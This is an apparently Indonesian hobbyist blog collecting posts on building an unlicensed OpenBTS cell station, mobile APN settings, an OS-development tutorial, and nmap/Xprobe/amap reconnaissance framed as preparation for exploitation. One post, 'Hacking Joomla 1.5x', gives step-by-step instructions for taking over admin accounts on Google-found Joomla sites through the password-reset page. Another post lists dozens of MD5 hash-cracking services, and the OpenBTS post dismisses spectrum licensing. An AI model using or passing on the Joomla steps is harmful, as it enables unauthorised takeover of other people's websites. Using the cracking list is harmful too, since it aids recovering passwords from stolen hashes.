Tips & Trick

Mudahnya Membuat Operator Selular Sendiri

2011-01-13T13:56:00.000+07:00

Pasti sebagian besar orang di Indonesia membayangkan bahwa membuat operator selular GSM sangat mahal dan ribet banget. Memang sih ada benarnya semua karena memang peralatan yang digunakan untuk membangun sebuah BTS GSM harganya mendekati Rp. 3 milyard per buahnya. Di jamin semua orang di Indonesia tidak akan ada yang bisa membuat BTS sendiri.

Kita harus bersyukur teknologi telah berkembang sedemikian majunya. Saat ini, kita BISA membuat BTS GSM sendiri! Alat yang dibutuhkan hanya USRP board sekitar US$1000-15000-an dengan bea masuk sekitar Rp. 8-10 juta-an. Ini mempunyai daya pancar kecil sekitar 200-300 mW saja. Di samping itu, kita perlu membuat sebuah sentral telepon kecil berbasis VoIPdi atas sebuah komputer. Investasi PC ini bisa kelas Pentium IV dengan harga sangat murah sekarang ini sekitar Rp. 1-2 juta saja. Jadi minimal sekali untuk satu ruangan kita dapat membangun sebuah BTS GSM sendiri dengan investasi sekitar Rp. 10-20 juta-an.

Untuk jarak yang lebih jauh kita memang membutuhkan sebuah penguat sinyal GSM harganya sekitar Rp. 10-20 juta-an lagi tergantung daya yang kita ingin tambahkan. Untuk daya sekitar 10 Watt akan cukup untuk memberikan layanan untuk satu kecamatan, satu sekolah, satu pesantren atau satu kampung yang radius-nya sekitar 2-3 km. Jadi dengan modal sekitar Rp. 20-40 juta-an kita bisa membuat sendiri sebuah BTS GSM untuk satu wilayah kecil.

Bayangkan sebuah pesantren dengan 2000 santri, misalnya masing-masing santri bisanya membayar pulsa handphone mereka sekitar Rp. 20.000 / bulan. Maka akan uang untuk membuat BTS GSM ini akan dapat terkumpul jika para santri bersedia infaq uang pulsanya selama satu bulan untuk BTS GSM buatan sendiri ini. Untuk selanjutnya para santri biasa menggunakan uang pulsa bulanannya untuk hal lain yang lebih produktif.

Kebutuhan Alat

Pertanyaan teknisnya. Dimana memperoleh software dan membeli peralatan yang dibutuhkan tersebut? Untuk konfigurasi minimal dengan daya 200-300 mW untuk sebuah ruangan saja maka jawabnya adalah,

Sebuah hardware Universal Software Radio Peripheral (USRP) yang bisa di beli / di pesan dari Ettus http://www.ettus.com. Ini kunci utamanya.
Sebuah PC minimal Pentium IV untuk sentral telepon VoIP-nya. Kayanya kalau ini sih banyak banget di Indonesia.
Sistem Operasi Ubuntu bisa di ambil gratis di http://www.ubuntu.com atau di http://kambing.ui.edu.
Software aplikasi GNURadio bisa di ambil di http://gnuradio.org/redmine/wiki/gnuradio/Download
Software aplikasi OpenBTS bisa di ambil gratis di http://openbts.sourceforge.net/
Software aplikasi Asterisk bisa di ambil gratis di http://www.asterisk.org

Semua software yang digunakan adalah open source jadi gratis bisa di ambil di Internet. Yang agak susah untuk di beli adalah hardware USRP saja.

[edit]Teknik Pembuatan

Teknik instalasi secara detail dapat di baca dengan mudah di Wiki tepatnya pada alamat

Secara umum teknik instalasinya adalah sebagai berikut,

Instal sistem operasi Ubuntu, butuh waktu sekitar 30-40 menit-an.
Instalasi aplikasi GNURadio, butuh waktu sekitar 30-60 menit-an.
Instalasi aplikasi OpenBTS, butuh waktu sekitar 30 menit-an
Instalasi aplikasi asterisk, butuh waktu sekitar 20 menit-an.
Konfigurasi VoIP softswitch, butuh waktu sekitar 60 menit-an.

[edit]Pengoperasian BTS GSM

Selesai sudah seluruh konfigurasi-nya dan kita bisa mengoperasikan OpenBTS untuk memberikan layanan GSM gratisan. Beberapa skenario / langkah operasi OpenBTS adalah

User menggunakan HP GSM biasa scanning secara manual.
User berasosiasi ke BTS GSM OpenBTS
User akan memperoleh SMS dari OpenBTS nomor IMSI-nya.
Admin memasukan nomor IMSI-nya agar bisa akses ke sentral telepon asterisk.

Setelah Admin memasukan nomot IMSI ke SIP.conf di asterisk maka user akan dapat menggunakan OpenBTS tanpa bayar pulsa sama sekali.

[edit]Pertanyaan

Pertanyaan yang sering di lontarkan antara lain adalah,

Apakah kita perlu ijin? Jawabnya: Teorinya memang semua penggunaan frekuensi di Indonesia harus pakai ijin. Masalahnya yang bisa dapat ijin penggunaan frekuensi selular 900MHz hanya operator saja. Tidak mungkin sekolah, kantor apalagi perorangan untuk memperoleh ijin tersebut.
Apakah kalau untuk penggunaan dalam kantor / rumah perlu ijin? Jawab: Faktanya sekarang ini banyak relay GSM yang digunakan untuk di dalam Mall, perkantoran yang di jual bebas dan di gunakan tanpa ijin heheh ..
Bagaimana kalau kita mengunakan ini untuk di daerah tertinggal / di kampung / di lokasi bencana alam? Jawab: kita berdoa saja semoga pemerintah kita cukup legowo untuk tidak mensweeping kita yang sedang mencari solusi untuk orang yang di timpa musibah.

[edit]Ke Depan

Pada tingkat lebih lanjut, kita dapat mengembangkan lebih lanjut infrastruktur ini misalnya,

Interkoneksi melalui Internet ke operator telekomunikasi Indonesia, seperti, XL, Axis, esia, BakrieTel dll karena mereka semua menggunakan protokol yang sama dengan asterisk yang digunakan oleh OpenBTS yaitu Session Initiation Protocol (SIP).
Membuat ENUM Server sendiri agar dapat mengenali penomoran +62.

sumber : http://opensource.telkomspeedy.com/wiki/index.php/Mudahnya_Membuat_Operator_Selular_Sendiri!_Nelepon_pakai_GSM_gratis_aja_kalee_..

Setting Internet Simpati/Hallo/AS GSM

2011-01-01T21:27:00.000+07:00

1. Telkomsel Flash – Halo/Simpati/As (Waktu)
Dial Up Number : *99***1#
User Name :
Password :
Access Point : FLASH
Extra Setting : at+cgdcont=1,”IP”,”flash”

2. Telkomsel GPRS – Halo/Simpati/As (Data)
Dial Up Number : *99***1#
User Name : wap
Password : wap123
Access Point : TELKOMSEL
Extra Setting : at+cgdcont=1,”IP”,”internet”

ok lets try

WIN 7 convert to Blackbox Linux

2010-12-29T14:05:00.000+07:00

blackbox desktop its very wonderfull if you wanna be hacker.
but, its easy if you just windows user. you can install BBLEAN software and try it.
you must download from : http://bb4win.sourceforge.net/bblean/ and NEXT - ..... and OK

this ex:

my desktop

Download Opera Browser

2010-12-28T22:35:00.000+07:00

Pingin Mengebut di Web... Pakai Opera Browser

Pengalaman browsing tercepat yang tersedia bagi Komputer/Laptop/netbook/smartphone bahkan telepon Anda. Dengan kecepatan pengolahan dan pengendaliannya yang efisien, Opera memimpin jauh di depan browser ponsel lain.
Browsing dengan mudah

Jelajahi Web pada komputer ataupun ponsel terasa sangat mudah. Telepon apa pun yang Anda pakai, pengalaman pengguna yang mulus menanti Anda.

Menghemat Biaya
Hemat biaya paket data dengan memanfaatkan teknologi kompresi Opera untuk mengurangi biaya data hingga 90%.

MD5 CRACKING

2010-12-28T10:25:00.000+07:00

This some website for decrypt MD5 password :

You can try and crack many password on md5 format.

http://www.milw0rm.com/cracker/
   http://www.plain-text.info/add/
   http://www.securitystats.com/tools/hashcrack.php
   http://www.passcrack.spb.ru/
   http://gdataonline.com/seekhash.php
   http://www.md5-brute.com/
   http://www.md5encryption.com/
   http://www.insidepro.com/hashes.php?lang=rus
   http://www.cirt.net/cgi-bin/passwd.pl
   http://passcracking.ru
   http://www.hashchecker.com/?_sls=add_hash
   http://www.tydal.nu/category/
   http://md5.dustinfineout.com/
   http://www.md5-db.com/
   http://www.md5hashes.com/
   http://sha1search.com/
   http://md5.xpzone.de/
   http://www.csthis.com/md5/
   http://md5.benramsey.com/
   http://www.md5this.com/crack-it-/index.php
   http://hackerscity.free.fr/
   http://ice.breaker.free.fr/
   http://md5search.deerme.org/
   http://www.md5decrypter.com/
   http://securitydb.org/cracker/
   http://plain-text.info/index/
   http://www.tmto.org/?category=main&page=home
   http://md5.geeks.li/
   http://hashreverse.com/
   http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
   http://md5crack.it-helpnet.de/index.php?op=add
   https://astalavista.net/index.php?
   http://md5search.uk.to/
   http://74.52.200.226/~b4ck/passhash/index.php
   http://www.tmto.org/
   http://md5.rednoize.com
   http://nz.md5.crysm.net
   http://us.md5.crysm.net
   http://www.xmd5.org
   http://gdataonline.com
   http://www.hashchecker.com
   http://passcracking.ru
   http://www.milw0rm.com/md5
   http://plain-text.info
   http://www.securitystats.com/tools/hashcrack.php
   http://www.schwett.com/md5/ – Does Norwegian words too
   http://passcrack.spb.ru/
   http://shm.pl/md5/
   http://www.und0it.com/
   http://www.neeao.com/md5/
   http://md5.benramsey.com/
   http://www.md5decrypt.com/
   http://md5.khrone.pl/
   http://www.csthis.com/md5/index.php
   http://www.md5decrypter.com/
   http://www.md5encryption.com/
   http://www.md5database.net/
   http://md5.xpzone.de/
   http://md5.geeks.li/
   http://www.hashreverse.com/
   http://www.cmd5.com/english.aspx
   http://www.md5.altervista.org/
   http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
   http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
   http://md5crack.it-helpnet.de/index.php?op=add
   http://cijfer.hua.fi/
   http://shm.hard-core.pl/md5/
   http://www.mmkey.com/md5/HOME.ASP
   http://www.thepanicroom.org/index.php?view=cracker
   http://rainbowtables.net/services/results.php
   http://rainbowcrack.com/
   http://www.securitydb.org/cracker/
   http://passwordsecuritycenter.com/in…roducts_ id=7
   http://0ptix.co.nr/md5
   https://www.astalavista.net/?cmd=rainbowtables
   http://ice.breaker.free.fr/
   http://www.md5this.com
   http://www.pldsecurity.de/forum/md5.php
   http://www.xeons.net/genesis/
   http://hackerscity.free.fr/
   http://bisix.cogia.net/
   http://md5.allfact.info/
   http://bokehman.com/cracker/
   http://www.tydal.nu/article/md5-crack/
   http://ivdb.org/search/md5/
   http://md5.netsons.org/
   http://md5.c.la/
   http://www.jock-security.com/md5_database/?page=crack
   http://c4p-sl0ck.dyndns.org/cracker.php
   http://www.blackfiresecurity.com/tools/md5lib.php
   http://www.md5-db.com/index.php
   http://passcrack.spb.ru/
   http://www.hashreverse.com/
   http://rainbowcrack.com/
   http://www.md5encryption.com/
   http://www.shalookup.com/
   http://md5.rednoize.com/
   http://c4p-sl0ck.dyndns.org/cracker.php
   http://www.tmto.org/
   http://linardy.com/md5.php
   http://www.gdataonline.com/seekhash.php
   https://www.w4ck1ng.com/cracker/
   http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
   http://www.hashchecker.com/index.php?_sls=search_hash
   http://www.rainbowcrack-online.com/
   http://schwett.com/md5/
   http://www.md5.org.cn/index_en.htm
   http://www.xmd5.org/index_en.htm
   http://nz.md5.crysm.net/
   http://us.md5.crysm.net/
   http://gdataonline.com/seekhash.php
   http://passcracking.ru/
   http://shm.pl/md5/
   http://www.neeao.com/md5/
   http://md5.benramsey.com/
   http://www.md5decrypt.com/
   http://md5.khrone.pl/
   http://www.csthis.com/md5/index.php
   http://www.md5decrypter.com/
   http://www.md5encryption.com/
   http://www.md5database.net/
   http://md5.xpzone.de/
   http://www.hashreverse.com/
   http://alimamed.pp.ru/md5/
   http://md5crack.it-helpnet.de/index.php?op=add
   http://shm.hard-core.pl/md5/
   http://rainbowcrack.com/
   http://passwordsecuritycenter.com/index.ph…p;products_id=7
   https://www.astalavista.net/?cmd=rainbowtables
   http://ice.breaker.free.fr/
   http://www.md5this.com/
   http://hackerscity.free.fr/
   http://md5.allfact.info/
   http://bokehman.com/cracker/
   http://www.tydal.nu/article/md5-crack/
   http://passcracking.com/
   http://ivdb.org/search/md5/
   http://md5.netsons.org/
   http://md5.c.la/
   http://www.md5-db.com/index.php
   http://md5.idiobase.de/
   http://md5search.deerme.org/
   http://sha1search.com/

notis : antihackerlink.co.id dan www.google.com

Hacking Joomla 1.5x

2010-12-28T10:21:00.000+07:00

Please sit down and try this!
1. Find a target:
searching via google.com wordkey Joomla 1.5x. ex: you get : www.target.com
2. Backdoor:
hijack script like this on after www.target.com/:
index.php?option=com_user&view=reset&layout=confirm
ex: http:www.target.com/index.php?option=com_user&view=reset&layout=confirm
3. Exploit:
write char: ` on colom input.
4. Enter new password admin .
5. and http://www.target.com/administrator/ so login. User default is admin.
6. Game Over!

ok.. lets try

Buat Sendiri SO x86

2005-02-25T20:10:00.000+07:00

Jadi Anda Ingin Membuat Sendiri Sistem Operasi x86?
By Patrick Mahoney

1. Perkenalan
Salah satu kesulitan besar yang dihadapi oleh programmer hobbyist ketika mulai mencoba mengembangkan sistem operasinya sendiri adalah menentukan dari mana ia harus memulai. Banyak buku menjelaskan dengan mendalam konsep sistem operasi secara teoritis, namun tidak satu pun yang tampaknya bisa membawa programmer hobbyist untuk memahami konsep tersebut. Ini adalah apa yang akan dilakukan oleh artikel ini.

Beberapa artikel yang berhubungan dengan topik ini muncul di beberapa edisi terakhir Linux Gazette. Saya merencanakan untuk melakukan pendekatan dengan menggunakan sesedikit mungkin gaya yang berorientasi pemrograman, dan hanya akan menunjukkan kepada pembaca tool dan tips yang akan ia butuhkan untuk memulai pengembangan dari sistem operasinya. Sekali ia membaca artikel ini, pembaca yang tertarik seharusnya segera mulai browsing segala sesuatu yang ia perlukan yang tersedia dan memulai untuk mendesain dan mengetikkan kode program.

Anda mungkin tidak mengerti, bahwa pengembangan suatu sistem operasi tidak dimulai dari awal. (!!) Menulis sebuah bootloader yang bagus akan menjadi keseluruhan proyek itu sendiri, dan saya tidak menyarankan anda untuk memulai sebuah proyek pengembangan sistem operasi dengan menulis sebuah bootloader. Banyak bootloader yang handal tersedia dengan bebas (Grub, lilo, ppcboot, dan lain-lain...). Jika anda berencana untuk menulisnya sendiri, saya menyarankan untuk menunda pekerjaan ini pada bagian lain dari proyek. Pada artikel ini, saya akan menggunakan GNU Grub, Grand Unified Bootloader.

2. Penjelasan mengenai lingkungan pengembangan
Untuk mengurangi kesulitan pengembangan sistem operasi, anda harus melakukan pengaturan sebuah lingkungan pengembangan yang disesuaikan, yang memenuhi beberapa syarat sebagai berikut:

Anda harus segera mengetes kernel yang baru saja dicompile
Anda tidak boleh mereboot mesin yang anda gunakan untuk pengembangan
Anda tidak boleh menggunakan floppy sebagai media penyimpanan untuk sistem operasi anda

Artikel ini akan menghadirkan satu dari beberapa lingkungan yang mungkin yang sesuai dengan syarat di atas, yang terdiri dari satu mesin pengembangan dan sebuah mesin pengujian, yang keduanya berada pada jaringan yang umum.
2.1 Mesin pengembangan
Tak dapat dihindari, mesin ini harus dilengkapi dengan satu set tool pemrograman yang baik: compiler assembly dan C, sebuah linker dan sebuah utilitas 'make' adalah suatu keharusan.

Sebuah tool yang lebih berguna daripada yang saya pikirkan adalah sebuah emulator. Tool ini akan membantu anda melakukan debug pada kernel dan akan mengijinkan anda untuk segera mengetes baris kode yang baru saja anda tambahkan. Namun jangan terlalu mudah dibodohi, sebuah emulator tidak akan bisa menggantikan sebuah mesin penguji yang bagus.

Selanjutnya, anda membutuhkan sebuah server TFTP. Tool ini akan mengijinkan bootloader mesin penguji yang tftp-enabled untuk mengambil kernel dari mesin pengembangan melalui koneksi jaringan.
2.2 Mesin penguji
Yang dibutuhkan mesin ini adalah sebuah network card dan sebuah bootloader yang tftp-enabled yang mendukungnya.
3. Mengatur lingkungan pengembangan
3.1 Mesin pengembangan
Tool programming yang dipilih adalah:
gcc 2.95.4
ld 2.13.90.0.10

Bochs versi 1.4.1 adalah emulator x86 yang dipilih. Perlakuan khusus harus dilakukan untuk mengcompilenya dengan debugger mode enabled. Perintah yang digunakan adalah:

$ ./configure --enable-x86-debugger
$ make
Agar Bochs bisa digunakan dengan baik, anda harus membuat sebuah disk image. Image ini harus memiliki sebuah bootloader dan sebuah filesystem. Ini bisa dilakukan dengan menggunakan script mkbimage. Jika anda malas untuk melakukannya sendiri, ambillah gzipped 10MB disk image ini dan tambahkan

diskc: file=c.img, cyl=24, heads=16, spt=63
pada file .bochrc.

Sebagai TFTP server, saya menggunakan atftpd. Ini adalah implementasi linux-based TFTP server yang mudah digunakan.
3.2 Mesin Penguji
Bootloader yang dipilih adalah GNU Grub versi 0.92. Perlakuan khusus harus dilakukan untuk mengenable tftp client pada Grub untuk bisa berkomunikasi dengan network card. Mesin penguji yang saya gunakan menggunakan NE2000 ISA clone yang murah. Mengikuti instruksi netboot/README.netboot dengan hati-hati, saya menggunakan perintah ini:

$ ./configure --enable-ne --enable-ne-scan=0x220
$ make
Ingat bahwa PnP PCI card akan lebih mudah untuk dikonfigurasi. Sekarang, anda dapat menginstal image Grub pada MBR mesin penguji atau pada floppy di mana mesin penguji anda akan diboot. Saya lebih memilih yang terakhir, karena mesin penguji juga digunakan untuk keperluan lain, dan oleh karena itu, saya memilih untuk tidak bermain-main dengan harddisknya.

$ cat ./stage1/stage1 ./stage2/stage2 > /dev/fd0
Sekarang tinggal memasukkan floppy pada mesin penguji untuk melihat apakah network card anda bisa dikenali. Anda bisa mengkonfigurasinya sendiri atau menggunakan dhcp server, jika ada.

grub> dhcp
Probing... [NE*000]
NE2000 base 0x220, addr 00:C0:A8:4E:5A:76
Address: 192.168.22.14
Netmask: 255.255.255.0
Server: 192.168.22.1
Gateway: 192.168.22.1
Ingat bahwa anda tidak perlu mengkonfigurasi parameter-parameter tersebut secara manual tiap kali anda melakukan boot. Lihatlah dokumentasi GNU Grub dan scipt 'grub-install' untuk lebih jelasnya.

That's it! Anda siap untuk melakukan tes!
4. Mengetes pengaturan lingkungan pengembangan anda...
Seperti yang telah saya sebutkan, saya akan membiarkan inti pemrograman sistem operasi kepada para ahlinya. Sehingga untuk mengetes pengaturannya, kita akan menggunakan contoh kernel dari source GNU Grub yang berada di direktori /docs.

Kernel tersebut dibangun dari tiga file source: boot.S, kernel.c dan multiboot.h. Anda bisa membangun kernel tersebut dengan:

$ gcc -I. -c ./boot.S
$ gcc -I. -c ./kernel.c
$ ld ./kernel.o ./boot.o -o kernel -Ttext 100000
Berikut adalah penjelasan singkat dan tidak lengkap. Multiboot adalah sebuah standar yang mendefinisikan sebuah cara bagi bootloader untuk melewatkan informasi menuju kernel yang akan dimuat. boot.S menerima informasi tersebut, mengeset sebuah stack (tumpukan), dan memanggil 'cmain'. Fungsi ini akan mengeset vga display, membaca informasi yang dilewatkan kepadanya, menampilkan beberapa pesan dan kemudian pergi. Lalu, boot.S kembali memegang kendali, menampilkan string 'Halted', dan memasuki loop yang tidak terbatas. Sangat sederhana, bukan? Pembaca dipersilakan untuk menggali kodenya untuk lebih detailnya.
4.1 ...dengan Bochs
Rencananya adalah memount disk image anda melewati sebuah loopback device, menyalin kernel anda pada filesystem image tersebut, meng-unmount image, dan menjalankan Bochs. Tentunya, anda harus menambahkan sebuah offset untuk menjalankan filesystem. Tetapi anda sudah tahu, kan?

# /sbin/losetup -o 32256 /dev/loop1 ./c.img
# /bin/mount -t ext2 /dev/loop1 /mnt/osdev/
# cp /docs/kernel /mnt/osdev
# umount /mnt/osdev/
# /sbin/losetup /dev/loop1 -d
$ bochs
Tentunya, hal di atas dapat diotomatisasi dengan Makefile. Pada Grub, lakukan:

grub> kernel (hd0,0)/kernel
grub> boot

(Klik pada gambar untuk ukuran penuh.)
4.2 ...dengan mesin penguji anda
Pertama, atur TFTP server anda sehingga client dapat mengambil kernel anda:

# /usr/sbin/atftpd --daemon /home/bono/src/grub-0.92/docs
Jalankan mesin penguji. Konfigurasikan koneksi jaringan anda seperti ditunjukkan di atas. Selanjutnya, tentukan alamat IP mesin pengembangan anda seperti alamat TFTP server dan lokasi dari kernel image. Ingat bahwa pilihan ini dapat diset oleh dhcp server. Akhirnya, mulailah proses boot.

(...)

grub> tftpserver 192.168.22.36
Address: 192.168.22.14
Netmask: 255.255.255.0
Server: 192.168.22.36
Gateway: 192.168.22.1

grub> kernel (nd)/kernel
[Multiboot-elf, <0x100000:0x807:0x0>, <0x101808:0x0:0x4018>,
shtab=0x106190, entry=0x100568]

grub> boot
Sebuah tampilan yang mirip dengan Bochs di atas akan muncul pada layar mesin penguji.
5. Kemana lagi setelah ini
Anda sudah begitu siap untuk memulai pengembangan sistem operasi. Banyak sekali dokumentasi yang bagus yang ada di web. Browse, kirim, tanya, dan berpikirlah. Monolithic atau micro kernel? Segmentation atau paging?

Jika kebutuhan debugging anda menjadi lebih besar daripada emulator dan kernel, sebuah pengaturan yang bisa anda tambahkan pada sistem operasi adalah serial debugger. Ini bisa bermacam-macam, dari beberapa bytes yang dilemparkan ke serial port, sampai sebuah gdb-compatible remote-debugging extension. Informasi ini bisa didapatkan dan diproses oleh mesin pengembangan anda melewati sebuah null-modem serial cable. Ini adalah suatu kebiasaan yang berguna dalam pengembangan sistem operasi.
6. Resources
Tanenbaum' os dev book
Buku pegangan bagi pengembangan sistem operasi
alt.os.development
Disana anda akan mendapatkan solusi untuk permasalahan anda!
Freenode IRC's #osdev (irc.debian.org)
Orang-orang yang bersahabat yang tidak pernah tidur!
Beberapa tutorial pengembangan sistem operasi termasuk dari Tim Robinson.
Tim pernah berada di sana!
Pusat Resource Sistem Operasi
BosoKernel
Tutorial pemula x86 yang manis. (Perancis)
Intel Architecture Software Developer's Manual Volume 3: System Programming
Jangan meninggalkan rumah tanpanya.
7. Terimakasih

NMAP TUTORIAL ++ BAB II

2005-02-25T20:05:00.000+07:00

Other Scanning Techniques

In my opinion nmap is the most superior network scanner. But there are some newer technologies being developed that are worth mentioning.

Xprobe2 ICMP based fingerprinting

Xprobe is a ICMP based passive fingerprinting tool, this is a newer technique being used very successfully instead of the old TCP based fingerprinting. Xprobe uses a different ICMP response to determine what Operating system the host is running, very similar to TCP based fingerprinting it compares it's results to a database. Another advantage of ICMP based fingerprinting is it's very fast, in most cases all it needs is one packet, unlike nmaps TCP fingerprinting thats needs to build custom packets and is quite time consuming, ICMP does not need to craft any specific packets. Each operating system has small differences in implementations of there TCP stack and Xprobe has a database of those differences.

[root@REDHATBOX xprobe2-0.1]# xprobe2 -v 192.168.0.3

XProbe2 v.0.1 Copyright (c) 2002-2003 fygrave@tigerteam.net, ofir@sys-security.com

[+] Target is 192.168.0.3
[+] Loading modules.
[+] Following modules are loaded:
[x]ICMP echo (ping)
[x]TTL distance
[x]ICMP echo
[x]ICMP Timestamp
[x]ICMP Address
[x]ICMP Info Request
[x]ICMP port unreach
[+] 7 modules registered
[+] Initializing scan engine
[+] Running scan engine
[+] Host: 192.168.0.3 is up (Guess probability: 100%)
[+] Target: 192.168.0.3 is alive
[+] Primary guess:
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.5 and above" (Guess probability: 95%)
[+] Other guesses:
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.2.x" (Guess probability: 95%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.6" (Guess probability: 87%)
[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.0 - 2.4.4" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "SCO OpenServer Release 5" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "OpenBSD 2.5" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.0" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.1" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.2" (Guess probability: 83%)
[+] Host 192.168.0.3 Running OS: "FreeBSD 4.5" (Guess probability: 79%)
[+] Host 192.168.0.3 Running OS: "FreeBSD 4.4" (Guess probability: 79%)
-------------------------------------SNIP---------------------------------------------------------

Xprobe has successfully identified the operating system as linux running kernel 2.45. Thats correct. This test took about 30-60seconds so its allot faster than Nmaps -O TCP fingerprinting. The next test was how it would go against a windows XP pro box.

[root@REDHATBOX xprobe2-0.1]# xprobe2 192.168.0.1

XProbe2 v.0.1 Copyright (c) 2002-2003 fygrave@tigerteam.net, ofir@sys-security.com

[+] Target is 192.168.0.1
[+] Loading modules.
[+] Following modules are loaded:
[x]ICMP echo (ping)
[x]TTL distance
[x]ICMP echo
[x]ICMP Timestamp
[x]ICMP Address
[x]ICMP Info Request
[x]ICMP port unreach
[+] 7 modules registered
[+] Initializing scan engine
[+] Running scan engine
[+] Host: 192.168.0.1 is up (Guess probability: 50%)
[+] Target: 192.168.0.1 is alive
[+] Primary guess:
[+] Host 192.168.0.1 Running OS: "Microsoft Windows 2000/2000SP1/2000SP2/2000SP3" (Guess probability: 58%)
[+] Other guesses:
[+] Host 192.168.0.1 Running OS: "Microsoft Windows XP Professional / XP Professional SP1" (Guess probability: 58%)
--------------------------------------SNIP-----------------------------------------------------

Unfortunately Xprobe failed to distinguish between xp and 2000. Nmap successfully guessed this was a xp pro box but Xprobe is giving us 6 possible versions. This is not accurate enough, if we where going to try the dcom exploit we would need to determine the exact operating system and service pack. So i suggest nmaps fingerprinting is still the most efficient, but as Xprobe grows and it's database gets updated it will be worth considering using is as a replacement, another good thing about Xprobe does not show up in snort logs and is allot faster than nmap.

Banner Grabbing

Before you can attempt any type of attack on a system you need to know what operating system is running and what services are running, we can determine them with nmap and if needed Xprobe. But you also need to know what version each service is to successfully exploit it. This is where banner grabbing comes into picture, if we can determine everything the target machine is running down to each version we greatly increase our chance of successful exploitation or finding a weakness in the system.

The First program we are going to look at for banner grabbing is Amap.

Just issue the command amap at the command prompt and you will get the following.

[root@REDHATBOX amap-4.0]# amap
amap v4.0 (c) 2003 by van Hauser and DJ RevMoon www.thc.org
Syntax: amap [-A|-B|-P] [-1buSRHUdqv] [[-m] -o ] [-D ] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i ] [target port [port] ...]
Modes:
-A Map applications: send triggers and analyse responses (default)
-B Just grab banners, do not send triggers
-P No banner or application stuff - be a (full connect) port scanner!
Options:
-1 Only send triggers to a port until 1st identification. Speeeeed!
-b Print ascii banner of responses
-i FILE Nmap machine readable outputfile to read ports from
-u Ports specified on commandline are UDP (default is TCP)
-S Do NOT look behind an SSL port
-R Do NOT identify RPC service
-H Do NOT send application triggers marked as potentially harmful
-U Do NOT dump unrecognised responses (better for scripting)
-d Dump all responses
-v Verbose mode, use twice (or more!) for debug (not recommended :-)
-q Do not report closed ports, and do not print them as unidentified
-o FILE Write output to file FILE
-m Make output to file (-o) machine-readable (colon-separated list)
-c CONS Amount of parallel connections to make (default 32, max 256)
-C RETRIES Number of reconnects on connect timeouts (see -T) (default 3)
-T SEC Connect timeout on connection attempts in seconds (default 5)
-t SEC Response wait timeout in seconds (default 5)
-p PROTO Only send triggers for this protocol (e.g. ftp)
-D FILE Read from Definitions FILE[.trig|.resp|.rpc] instead of default
-h Print this shit
TARGET PORT The target address and port(s) to scan (additional to -i)
amap is a tool to identify application protocols on target ports.

As you can see amap is used to identify services or daemons and also has a banner grabbing function. Amap and Nmap go hand in hand and i find them very useful when used in conjunction with each other.

[root@REDHATBOX amap-4.0]# nmap -oG amap.nmap -sT 192.168.0.4; amap -i amap.nmap.gnmap

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-08-01 01:15 EST
Interesting ports on 192.168.0.4:
(The 1637 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11

Nmap run completed -- 1 IP address (1 host up) scanned in 4.728 seconds
amap v4.0 (www.thc.org) started at 2003-08-01 01:16:04 - APPLICATION MAP mode

Protocol on 192.168.0.4:22/tcp matches ssh
Protocol on 192.168.0.4:22/tcp matches ssh-openssh
Protocol on 192.168.0.4:139/tcp matches netbios-session
Protocol on 192.168.0.4:21/tcp matches ftp
Protocol on 192.168.0.4:111/tcp matches rpc
Protocol on 192.168.0.4:6000/tcp matches x-windows
Protocol on 192.168.0.4:23/tcp matches telnet
Protocol on 192.168.0.4:1024/tcp matches rpc
Protocol on 192.168.0.4:111/tcp matches rpc-rpcbind-v2
Protocol on 192.168.0.4:1024/tcp matches rpc-status-v1

Unidentified ports: none.

amap v4.0 finnished at 2003-08-01 01:16:24

In the above command i used amaps abbility to greap nmaps -oG log format, so nmap scanned the target machine and identifed each open port, amap then gave us a protocol listing of what each service uses and what is actually running behind each port. But we can take this a step further and read some of the banners the above services display.

[root@REDHATBOX amap-4.0]# nmap -oG amap.nmap -sT 192.168.0.4; amap -B -i amap.nmap.gnmap

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-08-01 01:43 EST
Interesting ports on 192.168.0.4:
(The 1637 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11

Nmap run completed -- 1 IP address (1 host up) scanned in 6.358 seconds
amap v4.0 (www.thc.org) started at 2003-08-01 01:43:30 - BANNER GRAB mode

Banner on 192.168.0.4:21/tcp : 220 ready, dude (vsFTPd 1.1.0 beat me, break me)\r\n
Banner on 192.168.0.4:22/tcp : SSH-1.99-OpenSSH_3.4p1\n

amap v4.0 finnished at 2003-08-01 01:43:42

We only got 2 banners, and we need more banners to get a better understanding about the target machine and if it is possible to break.Amap is usfull but you can use other techniques. Another thing to note is if you know youre banners you can determine what services come default with each operating system, vsFTP 1.1.0 bundles with redhat linux 8.0.

For example if there is port 80 and 443 open this usually indicates there is a web server running. I use telnet but you can use netcat also to get the webservers version.

NMAP TUTOR ++ BAB I

2005-02-25T20:03:00.000+07:00

Introduction to Nmap

Nmap is the network exploration tool, it is essentially one of the most important tools to a security engineer or pen-tester. It is used as it's name suggests as a network exploration tool. With nmap you can probe a entire network and find out what services are listening on each specific port. Not only that but it incorporates fingerprinting that compares different fingerprints and gives you a estimate on what operating system the machine is running. Nmap has allot of options or flags that let you manipulate how it scans, you can simply do a tcp()connect scan that makes a full connection to the host or a syn scan also known as half connection, test firewall rules and distinguish if they are firewalls or packet filters, idle scan and spoof your ip through another machine or throw out decoys to make your presence less traceable. Nmap runs on linux/bsd and windows, although we will only be discussing it's usage under linux, the windows version is just a port from linux and can still be used as a supplement if you want but you do have access to the linux version in the attack lab.

Options and flags

